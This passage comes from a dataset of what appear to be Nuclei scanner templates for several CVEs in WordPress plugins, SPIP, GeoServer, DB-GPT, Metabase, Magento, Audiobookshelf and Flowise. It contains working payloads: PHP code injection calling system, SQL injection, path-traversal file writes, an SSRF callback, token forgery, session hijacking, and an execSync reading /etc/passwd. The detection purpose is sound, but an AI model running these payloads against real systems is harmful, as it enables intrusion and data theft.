\"{{sha256('{\\\"method\\\":\\\"GET\\\",\\\"url\\\":\\\"' + esc_url + '\\\",\\\"body\\\":\\\"\\\",\\\"timestamp\\\":\\\"' + ts + '\\\"}')}}\"\n  forged_token: \"{{sha256(data_hash + empty_salt)}}\"\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-json/newfold-data/v1/verify/00000000000000000000000000000000\"\n    headers:\n      Accept: application/json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code != 404 && contains(body, \"\\\"valid\\\"\")'\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-json/wp/v2/users/me?context=edit\"\n    headers:\n      Authorization: \"Bearer {{forged_token}}\"\n      X-Timestamp: \"{{ts}}\"\n      Accept: application/json\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        part: body\n        words:\n          - '\"administrator\"'\n\n      - type: word\n        part: body\n        words:\n          - '\"roles\"'\n# digest: 490a00463044022044a72eb5902e63afd84fb7e998a670f3b86eca84cc4eb4de3b5bbf5d0211cd7b02206ce7b3555dc4fcca5ee9f2cc454618b147e98e4a096d87b13f598d0562c3c202:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-80099.yaml","vuln_id":"cve-2026-80099"},{"raw":"id: CVE-2026-7798\n\ninfo:\n  name: WordPress FluentCRM <= 2.9.87 - Unauthenticated Blind SSRF\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    FluentCRM WordPress plugin <= 2.9.87 contains a blind server-side request forgery caused by improper validation of the 'SubscribeURL' parameter, letting unauthenticated attackers make arbitrary web requests, exploit requires unconfigured SES bounce handling key.\n  impact: |\n    Unauthenticated attackers can make arbitrary internal web requests, potentially querying or modifying internal service information.\n  remediation: |\n    Update to a version later than 2.9.87 or the latest available version.\n  reference:\n    - https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-7798\n    - https://wordpress.org/plugins/fluent-crm/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N\n    cvss-score: 5.4\n    cve-id: CVE-2026-7798\n    epss-score: 0.00695\n    epss-percentile: 0.5156\n    cwe-id: CWE-918\n  metadata:\n    verified: false\n    max-request: 2\n    publicwww-query: \"wp-content/plugins/fluent-crm\"\n    fofa-query: body=\"fluent-crm\"\n    shodan-query: http.html:\"fluent-crm\"\n  tags: cve,cve2026,wordpress,wp-plugin,fluentcrm,ssrf,wp\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/fluent-crm/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"FluentCRM\")'\n          - 'compare_versions(version, \"<= 2.9.87\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        regex:\n          - '(?i)Stable tag:\\s*([\\w.]+)'\n        group: 1\n        internal: true\n\n  - raw:\n      - |\n        POST /?fluentcrm=1&route=bounce_handler&provider=ses HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"Type\":\"SubscriptionConfirmation\",\"SubscribeURL\":\"http://{{interactsh-url}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"http\")'\n          - 'status_code == 200'\n          - 'contains(body, \"success\")'\n        condition: and\n# digest: 490a0046304402202185633640dde9068f3bc10de25d1222645661feaf7ca312e8cee8e69645ceb502207daf67416664f6aad5438ae0e122a52252de28ff818c789a480dfc6f57c022cd:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-7798.yaml","vuln_id":"cve-2026-7798"},{"raw":"id: CVE-2026-77806\n\ninfo:\n  name: SPIP < 4.4.22 - Unauthenticated RCE\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    SPIP < 4.4.21 contains a remote code execution caused by mishandling of the X-Spip-Filtre HTTP request header in analyse_resultat_skel, letting unauthenticated remote attackers execute arbitrary code.\n  impact: |\n    Unauthenticated remote attackers can execute arbitrary code, potentially leading to full system compromise.\n  remediation: |\n    Update to version 4.4.21 or later.\n  reference:\n    - https://securityonline.info/cve-2026-77806-spip-unauthenticated-rce/\n    - https://blog.spip.net/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-77806\n    epss-score: 0.04201\n    epss-percentile: 0.90507\n    cwe-id: CWE-94\n  metadata:\n    max-request: 1\n    verified: true\n    shodan-query: http.component:\"SPIP\"\n    fofa-query: body=\"spip.php\"\n  tags: cve,cve2026,spip,rce,unauth,vkev\n\nvariables:\n  marker: \"{{rand_text_alphanumeric(8)}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /spip.php HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(tolower(body), \"spip.php\", \"spip_document\", \"spip_logo\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /spip.php?page=sommaire&{{rand_text_alpha(8)}}=%3C%3Fphp%20header(%22X-Spip-Filtre:%20intval|_request|system%22);%20%3F%3E HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        0=echo {{marker}}\n\n    redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"{{marker}}\")'\n        condition: and\n# digest: 4a0a00473045022051dd9f4d07e64f55c879364cdc70a4e2bc0e830eb0249e6e2be387a02bb88fd90221009c600dc5423b36ece07cd22f7275948afe733067317c86995b1f67d1586812a4:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-77806.yaml","vuln_id":"cve-2026-77806"},{"raw":"id: CVE-2026-76904\n\ninfo:\n  name: GeoServer jsonArrayContains CQL Filter - SQL Injection\n  author: portbuster1337,DhiyaneshDk\n  severity: critical\n  description: |\n    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoTools FilterToSqlHelper.constructEquality writes the expected argument of the jsonArrayContains CQL function RAW into the SQL string while only escaping the JSON pointer. A single quote in the value parameter breaks out of the PostgreSQL jsonb_path_exists string literal, enabling unauthenticated SQL injection. When the PostGIS backend runs with superuser privileges, the injection escalates to operating system command execution through PostgreSQL COPY TO PROGRAM. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should enable the PostGIS DataStore preparedStatements setting and disable encode functions as a workaround.\n  impact: |\n    Successful exploitation allows unauthenticated attackers to execute arbitrary SQL queries against the PostGIS database, potentially leading to full database exfiltration, data manipulation, or remote code execution on the database server via COPY TO PROGRAM.\n  remediation: |\n    Upgrade GeoServer to version 2.21.4 or 2.22.2 or later. As an interim workaround, enable the PostGIS DataStore preparedStatements setting to prevent stacked-query abuse and disable encode functions to limit CQL filter function misuse.\n  reference:\n    - https://gist.github.com/portbuster1337/70d75ec246b85e3199037ce212ff1a06\n    - https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-25157\n    - https://github.com/geoserver/geoserver/commit/145a8af798590288d270b240235e89c8f0b62e1d\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-25157\n    cwe-id: CWE-89\n    epss-score: 0.01791\n    epss-percentile: 0.77407\n    cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*\n  metadata:\n    verified: \"true\"\n    max-request: 6\n    vendor: osgeo\n    product: geoserver\n    shodan-query:\n      - title:\"geoserver\"\n      - http.title:\"geoserver\"\n    fofa-query:\n      - title=\"geoserver\"\n      - app=\"geoserver\"\n    google-query: intitle:\"geoserver\"\n  tags: cve,cve2023,geoserver,sqli,jsonarraycontains,postgresql,osgeo,vkev\n\nflow: |\n  set(\"ctx\", \"/geoserver\");\n  http(\"detect\");\n  if (!template[\"geoserver_detected\"]) {\n    set(\"ctx\", \"\");\n    http(\"detect\");\n  }\n  if (template[\"geoserver_detected\"]) {\n    http(\"capabilities\");\n    for (var name of iterate(template[\"feature_names\"])) {\n      set(\"name\", name);\n      set(\"column\", \"\");\n      http(\"get-column\");\n      if (template[\"column\"]) {\n        if (http(\"sqli-verify\")) {\n          break;\n        }\n        if (http(\"sqli-time\")) {\n          break;\n        }\n      }\n    }\n  }\n\nhttp:\n  - id: detect\n    raw:\n      - |\n        GET {{ctx}}/web/ HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: word\n        words:\n          - \"GeoServer\"\n        internal: true\n\n    extractors:\n      - type: regex\n        name: geoserver_detected\n        regex:\n          - '(GeoServer)'\n        group: 1\n        internal: true\n        part: body\n\n  - id: capabilities\n    raw:\n      - |\n        GET {{ctx}}/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1\n        Host: {{Hostname}}\n\n\n    matchers:\n      - type: word\n        words:\n          - \"FeatureType\"\n        internal: true\n\n    extractors:\n      - type: regex\n        name: feature_names\n        regex:\n          - '(?s)<FeatureType[^>]*>\\s*<Name>([^<]+)</Name>'\n        group: 1\n        internal: true\n        part: body\n\n  - id: get-column\n    raw:\n      - |\n        GET {{ctx}}/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=1&outputFormat=csv HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        words:\n          - \"FID\"\n        internal: true\n\n    extractors:\n      - type: regex\n        name: column\n        regex:\n          - 'FID,([a-zA-Z_][a-zA-Z0-9_]*)'\n        group: 1\n        internal: true\n        part: body\n\n  - id: sqli-verify\n    raw:\n      - |\n        GET {{ctx}}/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=jsonArrayContains(%22{{column}}%22,%27/a%27,%27x%27%27%27)%20=%20true HTTP/1.1\n        Host: {{Hostname}}\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"PSQLException\"\n          - \"SQL SELECT\"\n          - \"jsonb_path_exists\"\n          - \"syntax error\"\n          - \"unterminated quoted string\"\n        condition: or\n\n      - type: word\n        part: header\n        words:\n          - \"text/xml\"\n\n    extractors:\n      - type: dsl\n        name: matched_feature\n        dsl:\n          - \"name\"\n      - type: kval\n        kval:\n          - content_type\n\n  - id: sqli-time\n    raw:\n      - |\n        @timeout: 30s\n        GET {{ctx}}/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=jsonArrayContains(%22{{column}}%22,%27/a%27,%27x%22)%27%27)%20AND%20(SELECT%20pg_sleep(6))%20IS%20NOT%20NULL%20)--%27)%20=%20true HTTP/1.1\n        Host: {{Hostname}}\n\n    stop-at-first-match: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"duration>=6\"\n\n    extractors:\n      - type: dsl\n        name: matched_feature\n        dsl:\n          - \"name\"\n# digest: 4b0a00483046022100b61884e439d60a0bf80bee63d007da8c61de696db58f2dac99b4023ca2c20ff1022100b45616ad557fdc79bf550d344fb5a600fbcb0aaa5d739299da5181f230b3fbd6:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-76904.yaml","vuln_id":"cve-2026-76904"},{"raw":"id: CVE-2026-7467\n\ninfo:\n  name: Read More & Accordion <= 3.5.7 - Authenticated Privilege Escalation\n  author: zer0p0int\n  severity: high\n  description: |\n    The Read More & Accordion (expand-maker) plugin for WordPress through 3.5.7 allows privilege escalation due to improper validation in the importData AJAX handler (yrm_import_data action). An authenticated user with plugin access can upload a crafted JSON attachment to insert arbitrary rows into WordPress database tables, including those that control user roles and capabilities, potentially leading to site takeover.\n  impact: |\n    Authenticated attackers can insert arbitrary rows into any WordPress database table, allowing creation of a new administrator account and full takeover of the site.\n  remediation: |\n    Update to the latest version of the Read More & Accordion (expand-maker) plugin.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/adf51c03-b0bb-4864-b64d-6b0cba4b0130\n    - https://wordpress.org/plugins/expand-maker/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-7467\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2026-7467\n    epss-score: 0.01242\n    epss-percentile: 0.67882\n    cwe-id: CWE-269\n  metadata:\n    verified: false\n    max-request: 4\n    vendor: radmore\n    product: expand-maker\n    framework: wordpress\n    publicwww-query: \"/wp-content/plugins/expand-maker/\"\n  tags: cve,cve2026,wp,wordpress,wp-plugin,privilege-escalation,ssrf,authenticated\n\nhttp:\n  - raw:\n      - |\n        POST /wp-login.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=%2F&testcookie=1\n\n      - |\n        GET /wp-admin/admin.php?page=readMore HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=yrm_import_data&ajaxNonce={{yrm_nonce}}&attachmentUrl={{BaseURL}}/wp-json/\n\n    matchers:\n      - type: word\n        part: body_2\n        words:\n          - \"yrmBackendData\"\n\n      - type: word\n        part: body_3\n        words:\n          - '\"success\":true'\n          - \"Data import successful\"\n        condition: and\n\n    extractors:\n      - type: regex\n        name: yrm_nonce\n        group: 1\n        part: body_2\n        regex:\n          - 'yrmBackendData = \\{\"nonce\":\"([a-f0-9]+)\"'\n        internal: true\n# digest: 4a0a00473045022100ef27d050e9fbbcab497adff490d69b53dde35bd0d3b07d8502e7446e73d66d2e02200f97e5163f50855b50375c57ef70f83029dd79582c13655da370914af0e574eb:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-7467.yaml","vuln_id":"cve-2026-7467"},{"raw":"id: CVE-2026-73034\n\ninfo:\n  name: DB-GPT <= 0.8.1 - Arbitrary File Write\n  author: iacker\n  severity: critical\n  description: |\n    DB-GPT through 0.8.1 allows unauthenticated arbitrary file writes via a path traversal in the user_id HTTP header of the POST /api/v1/python/file/upload endpoint, letting attackers escape the intended upload directory and write files anywhere, as confirmed by the reflected upload path in the JSON response.\n  impact: |\n    Arbitrary file write as the DB-GPT process user, which can be escalated to remote code execution by writing to Python startup hooks, cron directories or agent scripts.\n  remediation: |\n    Upgrade DB-GPT to a version that validates the user_id header and confines the resolved upload path to the python_uploads directory.\n  reference:\n    - https://www.vulncheck.com/advisories/db-gpt-path-traversal-arbitrary-file-write-via-user-id-header\n    - https://github.com/eosphoros-ai/DB-GPT/issues/3104\n    - https://github.com/eosphoros-ai/DB-GPT/commit/e0c741bd2b5e521b128cffb3f68982dde3f7b359\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-73034\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-73034\n    epss-score: 0.05122\n    epss-percentile: 0.92005\n    cwe-id: CWE-22\n    cpe: cpe:2.3:a:eosphoros:db-gpt:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: eosphoros\n    product: db-gpt\n    shodan-query: http.favicon.hash:100632689\n    fofa-query: icon_hash=\"100632689\"\n  tags: cve,cve2026,dbgpt,eosphoros,lfi,traversal,file-write,intrusive\n\nvariables:\n  fname: \"{{rand_base(9)}}\"\n  boundary: \"{{rand_int(100000000, 999999999)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/python/file/upload HTTP/1.1\n        Host: {{Hostname}}\n        user-id: ../../../../../../../../../../tmp\n        Content-Type: multipart/form-data; boundary=----boundary{{boundary}}\n\n        ------boundary{{boundary}}\n        Content-Disposition: form-data; name=\"file\"; filename=\"{{fname}}.py\"\n        Content-Type: text/x-python\n\n        print(\"{{fname}}\")\n        ------boundary{{boundary}}--\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"\\\"success\\\":true\"\n          - \"/tmp/{{fname}}.py\"\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        part: body\n        words:\n          - \"python_uploads\"\n        negative: true\n\n    extractors:\n      - type: json\n        json:\n          - \".data\"\n# digest: 4a0a00473045022003c25cc8de8464ea93cfa0f9e2363857ff3ab017f452466b83ba2bf41a4b98e2022100f0cc433dc584fd59dc9fead5a39d97c7ce8331574e392a90af131f0f5e9b315c:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-73034.yaml","vuln_id":"cve-2026-73034"},{"raw":"id: CVE-2026-72898\n\ninfo:\n  name: Metabase - Unauthenticated SQL Injection\n  author: 0x_Akoko,pdteam\n  severity: critical\n  description: |\n    Metabase contains a sql injection caused by improper sanitization of input in the '/reset_password' database endpoint, letting remote unauthenticated attackers gain administrator access, exploit requires no special privileges.\n  impact: |\n    Remote unauthenticated attackers can execute arbitrary SQL and gain administrator access to the Metabase instance.\n  remediation: |\n    Update to the latest version of Metabase.\n  reference:\n    - https://github.com/metabase/metabase/security/advisories/GHSA-vwf4-m7j8-wcjf\n    - https://securityonline.info/metabase-sql-injection-zero-day-exploited/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-72898\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-72898\n    epss-score: 0.94217\n    epss-percentile: 0.99846\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 3\n    shodan-query: http.title:\"Metabase\"\n    fofa-query: title=\"Metabase\"\n    product: metabase\n    vendor: metabase\n  tags: cve,cve2026,sqli,metabase,unauth,rce,kev,vkev\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        POST /api/session/reset_password HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"token\":{\"select\":1},\"password\":\"TestPassword1!\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 400'\n          - 'contains_all(body, \"should be a string\", \"{:select 1}\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /api/session/reset_password HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"token\":{\"select\":[\"email\",\"id\"],\"from\":[\"core_user\"],\"where\":[\"=\",\"is_superuser\",true],\"limit\":1},\"password\":\"TestPassword1!\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 400'\n          - 'contains_all(body, \"is_superuser\", \"core_user\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /api/session/reset_password HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"token\":\"1_0000\",\"password\":\"TestPassword1!\",\"user-id\":{\"select\":[\"id\"],\"from\":[\"core_user\"],\"where\":[\"=\",\"is_superuser\",true],\"limit\":1}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 400'\n          - 'contains_all(body, \"\\\"errors\\\"\", \"\\\"password\\\"\")'\n          - '!contains(body, \"disallowed key\")'\n        condition: and\n# digest: 490a004630440220247a108c8213a328b649007b3d2ed0fa750292ca366174dd2b94758172524326022006c612e94363c0d55487d6c7941af1025d70faf5e3c49afd0d5f1ca5412c68b8:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-72898.yaml","vuln_id":"cve-2026-72898"},{"raw":"id: CVE-2026-71362\n\ninfo:\n  name: Adobe Commerce/Magento - Customer Session Identity Switch\n  author: 0x_Akoko,dinosn\n  severity: critical\n  description: |\n    Adobe Commerce contains an incorrect authorization vulnerability caused by improper access control, letting attackers escalate privileges to access sensitive resources, exploit requires no user interaction.\n  impact: |\n    Attackers can gain elevated access to sensitive resources, potentially compromising system integrity and data confidentiality.\n  remediation: |\n    Update to the latest version of Adobe Commerce.\n  reference:\n    - https://helpx.adobe.com/security/products/magento/apsb26-92.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-71362\n    - https://sansec.io/research/adobe-commerce-account-takeover-apsb26-92\n    - https://github.com/dinosn/cve-2026-71362-magento-lab\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2026-71362\n    epss-score: 0.2452\n    epss-percentile: 0.97777\n    cwe-id: CWE-863\n  metadata:\n    max-request: 6\n    verified: true\n    vendor: adobe\n    product: magento\n    shodan-query: http.component:\"Magento\"\n    fofa-query: app=\"Magento\"\n  tags: cve,cve2026,magento,adobe-commerce,ato,account-takeover,intrusive,vkev\n\nvariables:\n  rnd: \"{{rand_int(100000, 999999)}}\"\n  email: \"poctest{{rnd}}@poctest.invalid\"\n  password: \"PoCPwd#{{rnd}}\"\n\nflow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)\n\nhttp:\n  - raw:\n      - |\n        GET /customer/account/create HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(tolower(body), \"form_key\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: fk\n        group: 1\n        regex:\n          - 'name=\"form_key\"[^>]*value=\"([^\"]+)\"'\n        internal: true\n\n      - type: regex\n        name: sessid\n        part: header\n        group: 1\n        regex:\n          - '(?i)Set-Cookie:\\s*(PHPSESSID=[^;]+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /customer/account/createPost HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Cookie: {{sessid}}\n        Referer: {{BaseURL}}/customer/account/create\n\n        form_key={{fk}}&firstname=PoCTestCVE&lastname=Detector&email={{email}}&password={{password}}&password_confirmation={{password}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 || status_code == 302'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: sessid\n        part: header\n        group: 1\n        regex:\n          - '(?i)Set-Cookie:\\s*(PHPSESSID=[^;]+)'\n        internal: true\n\n  - raw:\n      - |\n        GET /customer/account/edit HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: {{sessid}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"PoCTestCVE\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: fk\n        group: 1\n        regex:\n          - 'name=\"form_key\"[^>]*value=\"([^\"]+)\"'\n        internal: true\n\n      - type: regex\n        name: sessid\n        part: header\n        group: 1\n        regex:\n          - '(?i)Set-Cookie:\\s*(PHPSESSID=[^;]+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /customer/account/editPost HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Cookie: {{sessid}}\n        Referer: {{BaseURL}}/customer/account/edit\n\n        form_key={{fk}}&id=1&change_email=1&current_password=wrong-password-forces-exception&email={{email}}&firstname=PoCTestCVE&lastname=Detector\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 || status_code == 302'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: sessid\n        part: header\n        group: 1\n        regex:\n          - '(?i)Set-Cookie:\\s*(PHPSESSID=[^;]+)'\n        internal: true\n\n  - raw:\n      - |\n        GET /customer/account/edit HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: {{sessid}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: sessid\n        part: header\n        group: 1\n        regex:\n          - '(?i)Set-Cookie:\\s*(PHPSESSID=[^;]+)'\n        internal: true\n\n  - raw:\n      - |\n        GET /customer/section/load?sections=customer&force_new_section_timestamp=true HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: {{sessid}}\n        X-Requested-With: XMLHttpRequest\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - '!contains(body, \"PoCTestCVE\")'\n          - 'regex(\"\\\"firstname\\\":\\\"[A-Za-z0-9]\", body)'\n        condition: and\n\n    extractors:\n      - type: regex\n        name: victim_firstname\n        group: 1\n        regex:\n          - '\"firstname\":\"([^\"]+)\"'\n# digest: 4a0a0047304502200d7c12a8ac27a64b40d3d6197448e1681d17935a44d98feceb883f32cb9ce9e5022100f026dbae0e978c2b27d4a27b85901a2a7f86ec8de6ff2d872712fd5d34aeca58:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-71362.yaml","vuln_id":"cve-2026-71362"},{"raw":"id: CVE-2026-71209\n\ninfo:\n  name: Audiobookshelf - Authentication Bypass\n  author: str4k3r\n  severity: critical\n  description: |\n    Audiobookshelf contains a path traversal caused by improper authentication-exemption check on URL-encoded paths in server/routers/Auth.js, letting unauthenticated attackers read arbitrary files, exploit requires crafted URL with encoded traversal sequences.\n  impact: |\n    Unauthenticated attackers can read arbitrary files accessible by the service account, leading to sensitive information disclosure.\n  remediation: |\n    Update to the latest version with proper decoding and authentication checks for path parameters.\n  reference:\n    - https://github.com/advplyr/audiobookshelf/security/advisories/GHSA-pg8v-5jcv-wrvw\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-71209\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-71209\n    epss-score: 0.02005\n    epss-percentile: 0.79941\n    cwe-id: CWE-287\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: audiobookshelf\n    product: audiobookshelf\n    shodan-query: title:\"audiobookshelf\"\n    fofa-query: title=\"audiobookshelf\"\n  tags: cve,cve2026,audiobookshelf,auth-bypass,exposure\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(body, \"audiobookshelf\", \"Audiobookshelf\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /api/collections?r=/api/items/1/cover HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains(body, \"collections\")'\n        condition: and\n# digest: 4a0a00473045022100d03180dda0a30b0d1217e433cd4cbdcf2d08b7ab17137133bfab90b43d4661fe022034bce0f374120b2606d4d7e35aeab4f9d4f9e46c39438c1895e41ed8c68de6ca:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-71209.yaml","vuln_id":"cve-2026-71209"},{"raw":"id: CVE-2026-69251\n\ninfo:\n  name: Flowise < 3.1.3 - Remote Code Execution\n  author: 1dayexploit\n  severity: critical\n  description: |\n    Flowise prior to 3.1.3 contains a remote code execution vulnerability caused by allowing authenticated users to set arbitrary TypeORM DataSource options including entities that load local JavaScript files, letting authenticated users execute arbitrary code on the server, exploit requires user authentication.\n  impact: |\n    Authenticated users can execute arbitrary code on the server, potentially leading to full system compromise.\n  remediation: |\n    Update to version 3.1.3 or later.\n  reference:\n    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-g32j-mmxr-gfq5\n    - https://github.com/FlowiseAI/Flowise/commit/d07186844263bad057008863037466aff7c3390f\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-69251\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\n    cvss-score: 9.0\n    cve-id: CVE-2026-69251\n    epss-score: 0.03269\n    epss-percentile: 0.8785\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 5\n    vendor: flowiseai\n    product: flowise\n    shodan-query: http.title:\"Flowise\"\n    fofa-query: title=\"Flowise\"\n  tags: cve,cve2026,flowise,rce,authenticated,typeorm,intrusive\n\nvariables:\n  fname: \"{{to_lower(rand_text_alpha(8))}}\"\n  payload: \"throw new Error(require('child_process').execSync('cat /etc/passwd').toString())\"\n\nflow: http(1) && http(2) && http(3) && http(4) && http(5)\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/auth/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"email\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n    skip-variables-check: true\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_any(body, \"activeOrganizationId\", \"Unauthorized Access\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/document-store/store HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        x-request-from: internal\n\n        {\"name\":\"poc-{{fname}}\",\"description\":\"CVE-2026-69251\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 